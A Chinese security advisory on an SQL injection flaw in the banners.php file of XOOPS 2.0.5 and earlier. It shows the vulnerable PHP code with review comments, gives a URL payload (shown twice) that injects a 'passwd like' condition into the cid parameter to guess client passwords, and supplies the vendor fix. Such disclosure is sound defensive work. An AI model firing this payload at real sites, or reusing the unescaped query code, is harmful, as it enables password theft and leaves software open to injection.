| xoops存在sql注入缺陷 |
| 文章出处:不详 发布时间:2005-06-12 点击:0 |
涉及程序:
xoops 1.3.x版,2.0.x版到2.0.5版
描述:
xoops存在sql注入缺陷
详细:
xoops是一款用php编写的动态web站点程序。
xoops程序banners.php文件中的代码存在错误,允许未经授权的用户重定义本地变量并注入sql命令:
<?
[...]
function emailstats($login, $cid, $bid, $pass)
{
// Mails the statistics of banner $bid to the email address stored for client
// $cid. All four arguments are request-supplied (see the switch on $op further
// down). Nothing in the lines shown validates or escapes them, and $pass is
// never compared with the stored password in this function.
global $xoopsdb, $xoopsconfig;
// SQL sink: $cid is interpolated unquoted into the WHERE clause. This is the
// injection point the request shown later on this page targets.
$result2 = $xoopsdb->query("select name, email from
".$xoopsdb->prefix("bannerclient")." where cid=$cid");
list($name, $email) = $xoopsdb->fetchrow($result2);
// No row (fetchrow yields false, so $email is null) or a row without an
// email address: bounce back to banners.php.
if ( $email == "" ) {
redirect_header("banners.php",3,"there isn't an email associated with
client ".$name.".<br />please contact the administrator");
exit();
} else {
// Second SQL sink: $bid and $cid are interpolated unquoted here as well.
$result = $xoopsdb->query("select bid, imptotal, impmade, clicks,
imageurl, clickurl, date from ".$xoopsdb->prefix("banner")." where bid=$bid
and cid=$cid");
list($bid, $imptotal, $impmade, $clicks, $imageurl, $clickurl, $date) =
$xoopsdb->fetchrow($result);
[...]
// $left and $percent are used in the message below but are not computed in
// the lines shown; presumably the elided part derives them from the row.
$fecha = date("f js y, h:ia.");
// NOTE(review): sitename is an unquoted array key here, unlike the quoted
// 'sitename' used on the next line.
$subject = "your banner statistics at ".$xoopsconfig[sitename]."";
$message = "following are the complete stats for your advertising
investment at ". $xoopsconfig['sitename']." :\n\n\nclient name:
$name\nbanner id: $bid\nbanner image: $imageurl\nbanner url:
$clickurl\n\nimpressions purchased: $imptotal\nimpressions made:
$impmade\nimpressions left: $left\nclicks received: $clicks\nclicks percent:
$percent%\n\n\nreport generated on: $fecha";
// Send the report through the site mailer, from the configured admin address.
$xoopsmailer =& getmailer();
$xoopsmailer->usemail();
$xoopsmailer->settoemails($email);
$xoopsmailer->setfromemail($xoopsconfig['adminmail']);
$xoopsmailer->setfromname($xoopsconfig['sitename']);
$xoopsmailer->setsubject($subject);
$xoopsmailer->setbody($message);
$xoopsmailer->send();
// $login and $pass are echoed back into the redirect url unencoded.
redirect_header("banners.php?op=ok&login=$login&pass=$pass",3,"stati
stics
for your banner has been sent to your email address.");
//include "footer.php";
exit();
}
}
function change_banner_url_by_client($login, $pass, $cid, $bid, $url)
{
// Updates the click-through url of banner $bid after comparing $pass with the
// password stored for client $cid. All five arguments are request-supplied.
global $xoopsdb;
// SQL sink: $cid is concatenated unquoted into the WHERE clause of the query
// that fetches the password the comparison below relies on.
$result = $xoopsdb->query("select passwd from
".$xoopsdb->prefix("bannerclient")." where cid=".$cid."");
list($passwd) = $xoopsdb->fetchrow($result);
// Loose == comparison of the stored (plaintext) password; when no row was
// found, fetchrow yields false and $passwd is null.
if ( $pass == $passwd ) {
// Two more sinks: $url is placed between quotes but never escaped, and $bid
// is concatenated unquoted.
$xoopsdb->queryf("update ".$xoopsdb->prefix("banner")." set
clickurl='".$url."' where bid=".$bid."");
}
// The redirect and its "changed" message happen whether or not the update
// ran; $login and $pass are put into the url unencoded.
redirect_header("banners.php?op=ok&login=$login&pass=$pass",3,"url
has been changed.");
//include "footer.php";
exit();
}
[...]
switch ( $op ) {
// Request dispatcher. $op and the variables handed to each handler ($login,
// $pass, $cid, $bid, $url) are request-supplied and reach the handlers
// unchanged; the vendor fix further down this page casts $cid and $bid with
// intval() immediately before this switch.
case "change":
change_banner_url_by_client($login, $pass, $cid, $bid, $url);
break;
case "emailstats":
emailstats($login, $cid, $bid, $pass);
break;
[...]
}
?>
攻击者通过向目标服务器提交精心构造的下列格式的url请求即可触发该缺陷:
http://[target]/banners.php?op=emailstats&cid=1%20and%20passwd%20like%20'a%'/*
攻击方法:
示例代码:
http://[target]/banners.php?op=emailstats&cid=1%20and%20passwd%20like%20'a%'/*
解决方案:
用下列代码替换banners.php文件中的change_banner_url_by_client()函数:
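function change_banner_url_by_client($login, $pass, $cid, $bid, $url)
{
    // Lets a banner client change the click-through url of banner $bid after
    // proving knowledge of the password stored for client $cid.
    // All five arguments are request-supplied. The two ids are cast to int
    // inside the function, so the queries stay safe even if the intval() calls
    // recommended before the $op switch were not added, and $url is escaped by
    // the database layer instead of being concatenated raw.
    global $xoopsdb;
    $cid = intval($cid);
    $bid = intval($bid);
    if ( !empty($cid) and !empty($bid) and !empty($pass) ) {
        $result = $xoopsdb->query("select passwd from "
            .$xoopsdb->prefix("bannerclient")." where cid='".$cid."'");
        list($passwd) = $xoopsdb->fetchrow($result);
        // Unknown cid: fetchrow yields no row, $passwd stays null and the
        // strict comparison fails. === also avoids the numeric-string
        // coercion of == ('1e3' == '1000' is true).
        if ( isset($passwd) and $pass === $passwd ) {
            // quotestring() escapes the value and wraps it in quotes, so the
            // url can no longer break out of the SET clause.
            // NOTE(review): if magic_quotes_gpc is enabled on the install,
            // $url already carries slashes and must be stripped first - confirm.
            $xoopsdb->queryf("update ".$xoopsdb->prefix("banner")." set clickurl="
                .$xoopsdb->quotestring($url)." where bid='".$bid."'");
        }
    }
    // Redirect on every path: the vendor version fell through to exit() with no
    // response when an argument was empty. As before, the message does not
    // distinguish a failed password check, and $login and $pass are echoed
    // into the url unencoded.
    redirect_header("banners.php?op=ok&login=$login&pass=$pass",3,"url has been changed.");
    //include "footer.php";
    exit();
}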
在“switch($op) {”前添加下列代码:
// Coerce both ids to integers before the $op dispatch, so every handler
// (emailstats, change_banner_url_by_client, ...) receives a number rather
// than a string that may carry extra SQL.
$cid = (int) $cid;
$bid = (int) $bid;